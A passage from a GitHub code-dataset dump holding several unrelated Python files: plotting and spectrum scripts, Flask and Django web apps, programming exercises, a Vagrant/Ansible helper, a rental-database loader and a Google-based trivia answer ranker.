alpha=0.6,#透明度\r\n normalize_to=1.0,#venn图占据figure的比例,1.0为占满\r\n ax=axs[0],\r\n )\r\n\r\n# g1.get_label_by_id('01').set_fontsize(30)\r\n\r\n# axs[0].annotate('81200',\r\n# color='#098154',\r\n# xy=g1.get_label_by_id('10').get_position(),\r\n# xytext=(-120, 100),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi1=axs[0].annotate('4842',\r\n color='#c72e29',\r\n xy=g1.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(100, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi2=axs[0].annotate('6099',\r\n color='black',\r\n xy=g1.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-50, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n )\r\n\r\n\r\ng2=venn2(subsets=[set(data_bc['seq']),set(data_sly['seq'])],\r\n set_labels=(\"Bc\",\"Sly\"),\r\n set_colors=(\"blue\",\"red\"),\r\n alpha=0.6,\r\n normalize_to=1.0,\r\n ax=axs[1]\r\n )\r\n# axs[1].annotate('I like this green part!',\r\n# color='#098154',\r\n# xy=g2.get_label_by_id('10').get_position() - np.array([0, 0.05]),\r\n# xytext=(-80, 40),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi3=axs[1].annotate('8076',\r\n color='#c72e29',\r\n xy=g2.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(100, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi4=axs[1].annotate('8477',\r\n color='black',\r\n xy=g2.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-80, 150),\r\n weight= 50,\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n )\r\ng3=venn2(subsets=[set(data_yimei['seq']),set(data_potato['seq'])],\r\nset_labels=(\"Pi\",\"Po\"),\r\n set_colors=(\"blue\",\"red\"),\r\n alpha=0.6,\r\n normalize_to=1.0,\r\n ax=axs[2]\r\n )\r\n\r\n# axs[2].annotate('I like this green part!',\r\n# color='#098154',\r\n# xy=g3.get_label_by_id('10').get_position() - np.array([0, 0.05]),\r\n# xytext=(-80, 40),\r\n# ha='center', textcoords='offset points',\r\n# bbox=dict(boxstyle='round,pad=0.5', fc='#098154', alpha=0.6), # 注释文字底纹\r\n# arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#098154') # 箭头属性设置\r\n# )\r\n\r\nchi5=axs[2].annotate('63831',\r\n color='#c72e29',\r\n xy=g3.get_label_by_id('01').get_position() + np.array([0, 0.05]),\r\n xytext=(80, 150),\r\n weight = 'black',\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='#c72e29', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=0.5', color='#c72e29')\r\n )\r\n\r\nchi6=axs[2].annotate('23237',\r\n color='black',\r\n xy=g3.get_label_by_id('11').get_position() + np.array([0, 0.05]),\r\n xytext=(-60, 150),\r\n ha='center', textcoords='offset points',\r\n bbox=dict(boxstyle='round,pad=0.5', fc='grey', alpha=0.6),\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3,rad=-0.5', color='black')\r\n )\r\nchi1.set_fontsize(40)\r\nchi2.set_fontsize(40)\r\nchi3.set_fontsize(40)\r\nchi4.set_fontsize(40)\r\nchi5.set_fontsize(40)\r\nchi6.set_fontsize(40)\r\n# plt.subplots_adjust(left=0.1, bottom=0.5, right=0.8, wspace=0.01)\r\n# legend = plt.figlegend(prop=font1)\r\n# axs.set_labels( fontsize =15)\r\ng1.get_label_by_id('10').set_fontsize(40)#1的大小设置为20\r\ng2.get_label_by_id('10').set_fontsize(40)#1的大小设置为20\r\ng3.get_label_by_id('10').set_fontsize(40)#1的大小设��为20\r\n\r\nfor text in g1.set_labels:\r\n text.set_fontsize(40)\r\nfor text in g2.set_labels:\r\n text.set_fontsize(40)\r\nfor text in g3.set_labels:\r\n text.set_fontsize(40)\r\n\r\n# plt.tight_layout(pad=0.5)\r\n\r\nplt.savefig(('713.png'), dpi=300)\r\nplt.show()\r\n\r\n\r\n","repo_name":"chijunxia/common-mechanism-of-fungal-sRNA","sub_path":"Code/preprocessing/Vens.py","file_name":"Vens.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23428564915","text":"\"\"\"\"def binaryAdd(a,b):\n carry=0\n result=\"\"\n a,b=list(a),list(b)\n while a or b or carry==1:\n if a:\n carry+=int(a.pop())\n if b:\n carry+=int(b.pop())\n result+=str(carry%2)\n carry=carry//2\n return result\n\n\na=\"11\"\nb=\"1\"\nprint(binaryAdd(a,b))\"\"\"\n\ndef MyApproach(a,b):\n carry=0 #This One Hold th value in top of addtion\n ListA=list(a)\n ListB=list(b)\n result=\"\"\n while ListA or ListB or carry==1:\n if ListA:\n carry+=int(ListA.pop())\n if ListB: \n carry+=int(ListB.pop())\n \n result+=str(carry%2)\n carry=carry//2\n print(result[::-1])\n \na=\"11\"\nb=\"1\"\nMyApproach(a,b)","repo_name":"HussainPythonista/Leetcode-Prblems","sub_path":"BinaryAdd.py","file_name":"BinaryAdd.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"28939325691","text":"from django.urls import path\nfrom .views import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n path('', index, name='index'),\n path(\"Reservation\", reservation, name='reservation'),\n path(\"Contact\", contact, name='contact'),\n path(\"Blog\", blog, name='blog'),\n path(\"About\", about, name='about'),\n path(\"hotels\", hotels, name='hotels'),\n path(\"hotel\", hotel, name='hotel'),\n]\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"saeedsrm/HotelBooking","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10070616593","text":"#!/usr/bin/python3\n\n# This script adapted (with permission) from the script \"PlotBand\", a script by J. Grant Hill.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cclib\nimport argparse\nimport lineshapes\n\n\n# Set up argument parsing\nparser = argparse.ArgumentParser(description=\"This script uses cclib to extract a Lorentzian broadened IR spectrum from a Gaussian 09 calculation\")\nparser.add_argument(\"-i\", dest=\"file\", metavar=\"file\", help=\"input Gaussian 09 frequency calculation\", required=True)\nparser.add_argument(\"-f\", dest=\"fwhm\", metavar=\"fwhm\", help=\"the FWHM in cm-1 of the desired Lorentzians. Default: 6 cm-1\", type=int, required=False, default=6)\nparser.add_argument(\"-b\", dest=\"begin\", metavar=\"begin\", help=\"beginning (in cm-1) of plot. Default: 0 cm-1\", type=int, required=False, default=0)\nparser.add_argument(\"-e\", dest=\"end\", metavar=\"end\", help=\"end (in cm-1) of plot. Default: 4000 cm-1\", type=int, required=False, default=4000)\nparser.add_argument(\"-p\", dest=\"points\", metavar=\"points\", help=\"number of points in plot. Default: 8000\", type=int, required=False, default=8000)\nparser.add_argument(\"-s\", dest=\"save\", metavar=\"save\", help=\"file in which output will be save (optional)\", required=False, default=None)\nparser.add_argument(\"-q\", dest=\"quiet\", metavar=\"quiet\", help=\"by default a matplotlib window will appear, use -q True to prevent this\", required=False, default=None)\nargs = vars(parser.parse_args())\n\n# Parse the file using cclib\nincoming = cclib.parser.ccopen(args[\"file\"])\nparsedfile = incoming.parse()\n\n# Create the x axis using the settings\nx = np.linspace(args[\"begin\"], args[\"end\"], args[\"points\"])\n\n# Make the Lorentzians and add them together\ncomposite = 0\nfor count, peak in enumerate(parsedfile.vibfreqs):\n thispeak = lineshapes.IRLorentzian(x, peak, parsedfile.vibirs[count], args[\"fwhm\"])\n composite += thispeak\n\n# If saving has been asked for\nif args[\"save\"] is not None:\n with open(args[\"save\"], 'w') as csv:\n # Print a pre-amble so that csv is human readable\n csv.write(\"# Extracted & convoluted IR spectrum, with Lorentzian lineshapes, FWHM = {} cm-1\\n\".format(args[\"fwhm\"]))\n csv.write(\"# x / cm-1; epsilon / L mol-1 cm-1; vib. freq. / cm-1; intensity / km mol-1\\n\")\n for each in range(max(len(x), len(parsedfile.vibfreqs))):\n try:\n csv.write(\"{},{},{},{}\\n\".format(x[each], composite[each], parsedfile.vibfreqs[each], parsedfile.vibirs[each]))\n except IndexError:\n if len(x) > len(parsedfile.vibfreqs):\n csv.write(\"{},{}\\n\".format(x[each], composite[each]))\n else:\n csv.write(\"{},{}\\n\".format(parsedfile.vibfreqs[each], parsedfile.vibirs[each]))\n\n# If not in quiet mode\nif args[\"quiet\"] is None:\n # Set up the plot\n fig, ax1 = plt.subplots()\n # Axis 1 is the convoluted IR spectrum\n ax1.plot(x, composite)\n plt.xlabel('Frequency / cm$^{-1}$')\n ax1.set_ylabel('Molar absorption coefficient, $\\epsilon$ / L mol$^{-1}$ cm$^{-1}$')\n # Axis 2 is the stick spectrum, which shares the x axis\n ax2 = ax1.twinx()\n ax2.vlines(parsedfile.vibfreqs, 0, parsedfile.vibirs)\n ax2.set_ylabel('IR intensity / km mol$^{-1}$')\n # Change formatting and plot\n fig.tight_layout()\n plt.show()\n","repo_name":"theochemtheo/chemscripts","sub_path":"G09-EXTRACT_Lorentzian-IR.py","file_name":"G09-EXTRACT_Lorentzian-IR.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"10583976257","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef get_paginated_questions(request, questions, num_of_questions):\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * num_of_questions\n end = start + num_of_questions\n\n questions = [question.format() for question in questions]\n current_questions = questions[start:end]\n\n return current_questions\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n\n CORS(app, resources={'/': {'origins': '*'}})\n\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n @app.route('/categories')\n def get_all_categories():\n\n # This endpoint returns all categories\n\n try:\n categories = Category.query.all()\n category_dict = {}\n for category in categories:\n category_dict[category.id] = category.type\n\n return jsonify({\n 'success': True,\n 'categories': category_dict\n }), 200\n except Exception:\n abort(500)\n\n @app.route('/questions')\n def get_questions():\n # get paginated questions and categories\n questions = Question.query.order_by(Question.id).all()\n total_questions = len(questions)\n categories = Category.query.order_by(Category.id).all()\n\n current_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n if (len(current_questions) == 0):\n abort(404)\n\n category_dict = {}\n for category in categories:\n category_dict[category.id] = category.type\n\n return jsonify({\n 'success': True,\n 'total_questions': total_questions,\n 'categories': category_dict,\n 'questions': current_questions\n }), 200\n\n @app.route('/questions/', methods=['DELETE'])\n def delete_question(id):\n try:\n question = Question.query.get(id)\n question.delete()\n\n return jsonify({\n 'success': True,\n 'message': \"Question successfully deleted\"\n }), 200\n except Exception:\n abort(422)\n\n @app.route('/questions', methods=['POST'])\n def create_question():\n # Get data from request\n data = request.get_json()\n\n question = data.get('question', '')\n answer = data.get('answer', '')\n difficulty = data.get('difficulty', '')\n category = data.get('category', '')\n\n # if data is empty abort with 400\n if ((question == '') or (answer == '')\n or (difficulty == '') or (category == '')):\n abort(400)\n\n try:\n # Create a new question instance\n question = Question(\n question=question,\n answer=answer,\n difficulty=difficulty,\n category=category)\n\n # save question\n question.insert()\n\n # return success message\n return jsonify({\n 'success': True,\n 'message': 'Question created!'\n }), 201\n\n except Exception:\n abort(500)\n\n @app.route('/questions/search', methods=['POST'])\n def search_questions():\n data = request.get_json()\n search_term = data.get('searchTerm', '')\n\n # if empty return 400 bad request\n if search_term == '':\n abort(400)\n\n try:\n questions = Question.query.filter(\n Question.question.ilike(f'%{search_term}%')).all()\n\n # if there are no questions for search term return 404\n if len(questions) == 0:\n abort(404)\n\n # paginate questions\n paginated_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n # return response if successful\n return jsonify({\n 'success': True,\n 'questions': paginated_questions,\n 'total_questions': len(Question.query.all())\n }), 200\n\n except Exception:\n # This error code is returned when 404 abort\n # raises exception from try block\n abort(404)\n\n @app.route('/categories//questions')\n def get_questions_by_category(id):\n \"\"\"This endpoint handles getting questions by category\"\"\"\n\n # get the category by id\n category = Category.query.filter_by(id=id).one_or_none()\n\n # abort 400 for bad request if category isn't found\n if (category is None):\n abort(422)\n\n questions = Question.query.filter_by(category=id).all()\n\n # paginate questions\n paginated_questions = get_paginated_questions(\n request, questions,\n QUESTIONS_PER_PAGE)\n\n # return the results\n return jsonify({\n 'success': True,\n 'questions': paginated_questions,\n 'total_questions': len(questions),\n 'current_category': category.type\n })\n\n @app.route('/quizzes', methods=['POST'])\n def play_quiz_question():\n \"\"\"This returns a random question to play quiz.\"\"\"\n\n # process the request data and get the values\n data = request.get_json()\n previous_questions = data.get('previous_questions')\n quiz_category = data.get('quiz_category')\n\n # return 404 if quiz_category or previous_questions is empty\n if ((quiz_category is None) or (previous_questions is None)):\n abort(400)\n\n # if default value of category is given return all questions\n # else return questions filtered by category\n if (quiz_category['id'] == 0):\n questions = Question.query.all()\n else:\n questions = Question.query.filter_by(\n category=quiz_category['id']).all()\n\n # defines a random question generator method\n def get_random_question():\n return questions[random.randint(0, len(questions)-1)]\n\n # get random question for the next question\n next_question = get_random_question()\n\n # defines boolean used to check that the question\n # is not a previous question\n found = True\n\n while found:\n if next_question.id in previous_questions:\n next_question = get_random_question()\n else:\n found = False\n\n return jsonify({\n 'success': True,\n 'question': next_question.format(),\n }), 200\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'Bad request'\n }), 400\n\n # Error handler for resource not found (404)\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'Resource not found'\n }), 404\n\n # Error handler for internal server error (500)\n @app.errorhandler(500)\n def internal_server_error(error):\n return jsonify({\n 'success': False,\n 'error': 500,\n 'message': 'internal server error'\n }), 500\n\n # Error handler for unprocesable entity (422)\n @app.errorhandler(422)\n def unprocesable_entity(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'Unprocessable entity'\n }), 422\n\n return app\n","repo_name":"pranavswaroopreddy/Trivia-api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"652084741","text":"from flask import Flask, request, jsonify\nimport requests\n\napp2 = Flask(__name__)\n\ncpt1 = 0\ncpt2 = 0\n\n#Envoie de mon adresse au serveur 3 \nmy_adress = \"http://localhost:5372\"\nserver3_adress = \"http://localhost:8080/adresse2\"\ndata3 = {\"adress2\" : my_adress}\nr2 = requests.post(server3_adress, json=data3)\n\n@app2.route(\"/\", methods=[\"GET\"])\ndef start():\n return \"Acceuil Serveur 2\"\n\n#Fonction qui récupere l'adresse du serveur 1 depuis le serveur 3 et\n@app2.route(\"/pong\", methods=[\"GET\"])\ndef ping():\n server1 = requests.get(\"http://localhost:8080/send_adresse1\")\n requests.get(server1.text+\"/pong\")\n return \"ping sent\" \n\n\"\"\"\n@app2.route(\"/test\", methods=[\"GET\"])\ndef voircpt():\n tmp = requests.get(\"http://localhost:4567/cpt1\")\n print(\"tmp = \", tmp.text)\n print(\"type tmp = \" , type(tmp.text))\n print(\"type tmp int = \" , type(int(tmp.text)))\n print(\"tmp en int = \" , int(tmp.text))\n return \"voircpt\"\n\"\"\"\n\nif __name__ == '__main__':\n app2.run(host='serveur2', port=5372)\n \n\n\n","repo_name":"HugoMendes16/icvad","sub_path":"exo2/serv2.py","file_name":"serv2.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19548791308","text":"\nnumero= int(input(\"¿Qué número quieres saber si es primo? \"))\nvalor= range(2,numero)\ncontador = 0\n\nfor n in valor:\n if numero % n == 0:\n contador +=1\n print(\"divisor:\", n)\n\nif contador > 0 :\n print(\"El número no es primo\" )\nelse:\n print(\"El nÚmero es primo\") \n\n\n\ndef primo(num):\n if num < 2: #si es menor de 2 no es primo, devolverá Falso\n return False\n \n for i in range(2, num): #un ciclo desde el 2 hasta el num de entrada\n if num % i == 0: #si el resto da 0 no es primo, devuelve Falso\n return False\n return True #de lo contrario devuelve Verdadero\n\nnumero= int(input(\"¿Qué número quieres saber si es primo? \"))\nrespuesta=primo(numero)\nprint(respuesta)","repo_name":"mecomontes/Python","sub_path":"Desde0/NumeroPrimo.py","file_name":"NumeroPrimo.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"42210161049","text":"# def word(filename, x):\n# result = ''\n# index = 0\n# count = 0\n# wordfile = open(filename)\n# wordfile = wordfile.readline().split()\n# while index < len(wordfile):\n# if wordfile[index] == x:\n# count += 1\n# result += wordfile[index] + ' ' + str(count)\n# index += 1\n# return result\n# \n# print(word('fishy.txt', 'One'))\n\n# def numbers(filename):\n# result = ''\n# index = 0\n# wordfile = open(filename)\n# wordfile = list(str(wordfile.readline()))\n# while index < len(wordfile):\n# result += wordfile[index] + ' '\n# index += 1\n# return result\n# \n# print(numbers('id_file.txt'))\n\ndef print_powers(n, high):\n result = ''\n count = 0\n while count <= high:\n result += str(count * n) + ' '\n count += 1\n print(result)\n\n\ndef print_powers_table(high):\n row = 1\n while row <= high:\n print_powers(row, high)\n row += 1\n \nprint_powers_table(3)\n\n# def is_prime(n):\n# if n > 1:\n# for i in range(2,n):\n# if (n % i) == 0: \n# return 'not a prime number'\n# break\n# else: \n# return n\n\n# def number_of_prime_numbers(x):\n# index = 0\n# result = ''\n# while index <= 10:\n# is_prime(x)\n# result += str(index)\n# index += 1\n# return result\n# \n# print(number_of_prime_numbers(10))","repo_name":"Ben-Stacey/Comp150","sub_path":"Lab 11/Lab 11.py","file_name":"Lab 11.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20742422485","text":"#!/usr/bin/python\n\n\nimport json\nimport os\nimport sys\n\nfrom sh import vagrant\n\n\ndef split_args(args):\n newargs = {}\n for kv in args.split():\n parts = kv.split('=', 1)\n try:\n newargs[parts[0]] = parts[1]\n except IndexError:\n pass\n return newargs\n\n\ndef split_ssh_config(raw):\n if isinstance(raw, bytes):\n raw = raw.decode('utf-8')\n ssh_config = {}\n for line in raw.split('\\n'): \n line = line.strip()\n parts = line.split(None, 1)\n try:\n ssh_config[parts[0]] = parts[1].strip()\n except IndexError:\n pass\n return ssh_config\n\n\ndef main():\n \n results = {\n 'argv': sys.argv[:],\n 'changed': False,\n 'stdin': sys.stdin.read(),\n #'env': dict(os.environ)\n }\n\n argfile = sys.argv[1]\n with open(argfile, 'r') as f:\n args = f.read()\n args = split_args(args)\n results['args'] = args\n\n assert 'boxpath' in args, 'args must contain a boxpath'\n\n boxpath = args['boxpath']\n boxpath = boxpath.replace(\"'\", \"\")\n boxpath = boxpath.replace('\"', \"\")\n boxpath = os.path.expanduser(boxpath)\n boxpath = os.path.abspath(boxpath)\n pid = vagrant('ssh-config', _cwd=boxpath)\n pid.wait()\n results['ssh_config'] = split_ssh_config(pid.stdout)\n\n print(json.dumps(results)) \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jctanner/ansible-tools","sub_path":"vagrant/ansible_test_inventory/playbooks/roles/tower_master/library/vagrant_box_ssh_config.py","file_name":"vagrant_box_ssh_config.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"70"}
+{"seq_id":"22819691517","text":"# Uses python3\nimport sys\n\ndef optimal_summands(n):\n summands, i = [], 1\n for i in range(1, n + 1):\n if (i == n) or (2*i + 1 <= n):\n summands.append(i)\n n -= i\n if n == 0: return summands\n return summands\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n summands = optimal_summands(n)\n print(len(summands))\n for x in summands:\n print(x, end=' ')\n","repo_name":"bmharris626/coursera-algorithmic-toolbox","sub_path":"02_greedy_algorithms_submitted_answers/different_summands.py","file_name":"different_summands.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1221614268","text":"import psycopg2\nimport numpy as np\nfrom psycopg2.extensions import register_adapter, AsIs\npsycopg2.extensions.register_adapter(np.int64, psycopg2._psycopg.AsIs)\n\ndef reshape(rawdata, length):\n data = []\n for e in range(len(rawdata)) :\n data.append([])\n for i in range(length):\n data[-1].append(rawdata[e][i])\n return data\n\nps_connection = psycopg2.connect(dbname=\"immo\", user=\"root\", password=\"occulto\", host=\"db\")\ncursor = ps_connection.cursor()\ncursor.execute(\"CREATE TABLE IF NOT EXISTS immo(id SERIAL PRIMARY KEY, type VARCHAR(12), surface REAL, pieces SMALLINT, chambres SMALLINT, loyer SMALLINT, meuble BOOLEAN, jardin BOOLEAN, terrasse BOOLEAN, dist_centre SMALLINT, dist_transport SMALLINT, dist_commerce SMALLINT);\")\n\ncursor.execute(\"SELECT COUNT(*) FROM immo;\")\nif cursor.fetchall()[0][0] == 0 :\n\n gendata = np.genfromtxt(\"db.csv\", delimiter=\";\", dtype='S12, f8, i8, i8, i8, i8, i8, i8, i8, i8, i8')\n\n data = reshape(gendata, 11)\n\n for D in data :\n if D[0] == b'Appartement' :\n D[0] = 'Appartement'\n elif D[0] == b'Maison' :\n D[0] = 'Maison'\n else : D[0] = 'Studio'\n for k in [5, 6, 7] :\n D[k] = True if D[k] == 1 else False\n\n cursor.execute(\"INSERT INTO immo (type, surface, pieces, chambres, loyer, meuble, jardin, terrasse, dist_centre, dist_transport, dist_commerce) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\", D)\n \n print(\"Database filled from data/db.csv\")\n\nelse : print(\"Database ready\")\n\nps_connection.commit()\n","repo_name":"7evy/Fuzzy_Queries","sub_path":"web_app/fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15295167107","text":"#!/usr/bin/env python3\nimport collections\nfrom fuzzywuzzy import fuzz\nfrom google import google\nimport logging\nimport operator\nimport re\nimport requests\nimport termcolor\nimport webbrowser\n\nlogging.basicConfig(format='(%(levelname)s) %(message)s', level=logging.INFO)\nkInversionWords = [\"not\"]\n\n\nclass WebQuery:\n\n def __init__(self):\n self.results = []\n self.logger = logging.getLogger(self.__class__.__name__)\n self.inversion = False\n\n def search_google(self, query, pages=3, print_results=False):\n \"\"\"Query google for search results\n Args:\n query (String): to send to google\n pages (Number): of pages to parse from google result\n Returns:\n (Bool): On Success or failure\n \"\"\"\n self.query = query\n self.inversion = False\n # check for inversion language and mark it if found\n colored_query = query.split(\" \")\n query_without_inversion = query.split(\" \")\n for i, word in enumerate(colored_query):\n for inversion in kInversionWords:\n if inversion in word.lower():\n self.inversion = True\n colored_query[i] = termcolor.colored(\n colored_query[i], \"red\")\n # since inversions don't help in our queries,\n # we'll just drop them\n query_without_inversion[i] = \"\"\n\n colored_query_str = \" \".join(colored_query)\n query_without_inversion_str = \" \".join(query_without_inversion)\n self.logger.info(\"=================================\")\n self.logger.info(\"Query: \\\"{}\\\"\".format(colored_query_str))\n try:\n self.results = google.search(query_without_inversion_str, pages)\n except Exception as e:\n self.logger.error(\"Caught exception in google query: {}\".format(e))\n return False\n self.logger.info(\"Got {} results from the googz\".format(\n len(self.results)))\n if print_results:\n print(self.results)\n return True\n\n # def search_bing(self, query):\n # url = 'https://api.cognitive.microsoft.com/bing/v7.0/composite'\n # # query string parameters\n # payload = {'q': query}\n # # custom headers\n # headers = {'Ocp-Apim-Subscription-Key': '362ffe563af5458f8818a32a1a165d1b'}\n # # make GET request\n # r = requests.get(url, params=payload, headers=headers)\n # # get JSON response\n # j=r.json()\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(j)\n\n def get_answer_permutations(self, answer):\n \"\"\"Finds reversed strings of the input words\n Args:\n answer (String): of a single answer\n Returns:\n (List): of answers strings to search for\n \"\"\"\n answers = []\n answers.append(answer)\n if len(answer.split()) > 1:\n words = answer.split()\n words.reverse()\n new_words = \" \".join(words)\n answers.append(new_words)\n self.logger.info(\"Adding answer permutation for {} -> {}\".format(\n answer, new_words))\n return answers\n\n def check_counts_failure(self, counts):\n \"\"\"\n Check if we got all zeros, spawn a web browser for last ditch effort\n Args:\n counts (List): of pairs containing each answer and\n the count frequency found in query\n \"\"\"\n all_zeros = True\n for c in counts:\n if c[1] != 0:\n all_zeros = False\n break\n if all_zeros:\n self.logger.info(\"Found all zeros, spawning chrome\")\n query_split = self.query.split()\n query_pluses = \"+\".join(query_split)\n webbrowser.open(\n \"https://www.google.com/search?q={}\".format(query_pluses))\n\n def answer_frequency(self, answers):\n \"\"\"Test frequency of occurance of each answer against the search results\n Args:\n answers (List): of strings containing each answer\n Returns:\n (OrderedDict): Dictionary of results, sorted by most probable\n \"\"\"\n # stage our output counts with the origin answer counts\n counts = {}\n for answer in answers:\n counts[answer] = 0\n\n # iterate through each answer and count the occurances in each result\n # description test\n for answer in answers:\n # Find additonal answers to search by reversing the order of the\n # words if there are multiple words\n answer_perms = self.get_answer_permutations(answer)\n # find frequency of each answer set (including any possible\n # reversed strings)\n for result in self.results:\n r = re.compile(\"|\".join(r\"\\b%s\\b\" % w for w in answer_perms))\n count_result = collections.Counter(\n re.findall(r, result.description.lower()))\n # update the running counts\n for _, value in count_result.items():\n counts[answer] = counts[answer] + value\n\n # sort the results depending on if an inversion is detected or not\n reverse = False if self.inversion else True\n counts = sorted(counts.items(), key=operator.itemgetter(1),\n reverse=reverse)\n self.logger.info(\"=================================\")\n self.logger.info(\"Permutation match results\")\n for i, c in enumerate(counts):\n if i == 0:\n self.logger.info(termcolor.colored(\n \"{} : {} <---------------\".format(c[0], c[1]), \"green\"))\n else:\n self.logger.info(termcolor.colored(\n \"{} : {}\".format(c[0], c[1]), \"red\"))\n self.logger.info(\"=================================\")\n\n self.check_counts_failure(counts)\n return counts\n\n def answer_frequency_fuzzy(self, answers):\n \"\"\"Test probability (0-100) of match of each answer within each description set\n Args:\n answers (List): of strings containing each answer\n Returns:\n (OrderedDict): Dictionary of results, sorted by most probable\n \"\"\"\n # stage our output counts with the origin answer counts\n counts = {}\n for answer in answers:\n counts[answer] = 0\n\n # iterate through each answer and count the occurances in each result\n # description test\n for answer in answers:\n # find frequency of each answer set using fuzzy techniques\n for result in self.results:\n val = fuzz.token_set_ratio(answer, result.description.lower())\n counts[answer] = counts[answer] + val\n\n # sort the results depending on if an inversion is detected or not\n reverse = False if self.inversion else True\n counts = sorted(counts.items(), key=operator.itemgetter(1),\n reverse=reverse)\n self.logger.info(\"=================================\")\n self.logger.info(\"Fuzzy match results\")\n for i, c in enumerate(counts):\n if i == 0:\n self.logger.info(termcolor.colored(\n \"{} : {} <---------------\".format(c[0], c[1]), \"green\"))\n else:\n self.logger.info(termcolor.colored(\n \"{} : {}\".format(c[0], c[1]), \"red\"))\n self.logger.info(\"=================================\")\n\n self.check_counts_failure(counts)\n return counts\n\n\nif __name__ == \"__main__\":\n wb = WebQuery()\n # wb.search_google(\"final cut pro is apple's software for doing what?\")\n # counts = wb.answer_frequency(\n # [\"editing video\", \"spreadsheets\", \"creating music\"])\n\n wb.search_google(\"stradivarius was famous for making what\")\n counts = wb.answer_frequency([\"spotify\", \"violins\", \"hearing aids\"])\n counts = wb.answer_frequency_fuzzy([\"spotify\", \"violins\", \"hearing aids\"])\n\n # wb.search_google(\n # \"L.A. officials attended the 1956 World Series with hopes of luring\\\n # which team to the West Coast?\")\n # counts = wb.answer_frequency(\n # [\"St. Louis Browns\", \"New York Giants\", \"Washington Senators\"])\n # counts = 